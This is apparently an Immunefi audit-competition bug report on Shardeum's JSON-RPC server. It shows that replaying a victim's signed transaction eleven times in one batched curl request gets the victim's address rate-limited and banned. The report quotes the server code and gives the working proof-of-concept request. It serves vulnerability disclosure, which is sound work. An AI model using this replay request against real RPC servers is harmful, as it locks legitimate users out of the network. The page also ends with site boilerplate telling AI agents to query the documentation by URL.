# #39623 \[W\&A-Low] Blocking the victim's account address from sending transactions via JSON-RPC

**Submitted on Feb 3rd 2025 at 16:08:02 UTC by @anton\_quantish for** [**Audit Comp | Shardeum: Ancillaries III**](https://immunefi.com/audit-competition/audit-comp-shardeum-ancillaries-iii)

* **Report ID:** #39623
* **Report Type:** Websites and Applications
* **Report severity:** Low
* **Target:** <https://github.com/shardeum/json-rpc-server/tree/itn4>
* **Impacts:**
  * Temporarily disabling user to access target site, such as:
* Locking up the victim from login
* Cookie bombing, etc.

## Description

## Brief/Intro

It's possible to block the victim's account address so he won't be able to send any tx via JSON-RPC.

## Vulnerability Details

When the JSON-RPC request comes in, it passes through the `rateLimit.ts` middleware first and then every method call is checked via `checkRequest(ip, request)` function. Finally, the rate limits are checked within the `utils.ts:isRequestOkay` function.

In case of executing the `eth_sendRawTransaction` method, one of the checks performed is how often the tx sender (account address) calls this method. If it's too often (> 10 calls per a minute in default config), the request will be cancelled and the sender is marked as abused\
<https://github.com/shardeum/json-rpc-server/blob/aba70af9ae65b59034c87ced1253a7478a2a0293/src/utils.ts#L1097-L1109>

```js
if (config.rateLimit && config.rateLimitOption.limitFromAddress) {
  if (fromAddressHistory && fromAddressHistory.length >= 10) {
    if (now - fromAddressHistory[fromAddressHistory.length - 10] < oneMinute) {
      if (verbose) console.log(`Your address ${readableTx.from} injected 10 txs within 60s`)
      if (config.recordTxStatus)
        createRejectTxStatus(
          bufferToHex(transaction?.hash() as Buffer),
          'Rejected by JSON RPC rate limiting',
          ip
        )
      this.addAbusedAddress(readableTx.to, readableTx.from as string, ip)
      this.addAbusedSender((readableTx.from as string).toLowerCase())
      return false  // isRequestOkay return value, so the request cancelled
    }
  }
}
```

Moreover, every 2 minutes (by default) the top 10 most abusing senders are getting blacklisted so they are permanently blocked from sending transactions (in `checkAndBanSpammers` function):\
<https://github.com/shardeum/json-rpc-server/blob/aba70af9ae65b59034c87ced1253a7478a2a0293/src/utils.ts#L823-L836>

```js
const mostAbusedSendersSorted: { address: string; count: number }[] = Object.values(
      this.abusedSenders
    ).sort(
      (a: { address: string; count: number }, b: { address: string; count: number }) => b.count - a.count
    )
    console.log('Top 10 spammer addresses: ', mostAbusedSendersSorted.slice(0, 10))
    for (const spammerInfo of mostAbusedSendersSorted) {
      if (spammerInfo.count > allowedTxRate && config.rateLimit && config.rateLimitOption.banSpammerAddress) {
        this.addSenderToBacklist(spammerInfo.address)
        console.log(
          `Caller ${spammerInfo.address} is added to spammer list due to sending more than ${allowedTxRate} txs within 5 min.`
        )
      }
    }
```

The attack possible is that attacker can re-send arbitrary victim's transactions here to get the victim's account address banned so he won't be able to submit his own transactions anymore.

## Impact Details

The victim is not able to send transactions via JSON-RPC anymore.

Is it absolutely possible to get the victim's address banned on every public JSON-RPC server since the attack requires just a single request for even JSON-RPC server. This will block a victim from using the Shardeum network at all.

## Proof of Concept

## Proof of Concept

While JSON-RPC is running, get any raw tx of some victim and make the following request with CURL:

```
curl http://172.16.205.128:8080 -XPOST -H 'Content-Type: application/json' --data '[{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]}]'
```

There're 11 the same transactions in the single batch. This single request is the only needed to get the sender address banned. You will see in JSON-RPC server log that

> adding abused sender 0x7f39a55849ff447813557946fe387861784aadca

Then you can try to send any other transaction from the victim's address and you will see they are soft-rejected.

> Network is currently busy. Please try again later.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://reports.immunefi.com/shardeum-ancillaries-iii/39623-w-and-a-low-blocking-the-victims-account-address-from-sending-transactions-via-json-rpc.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.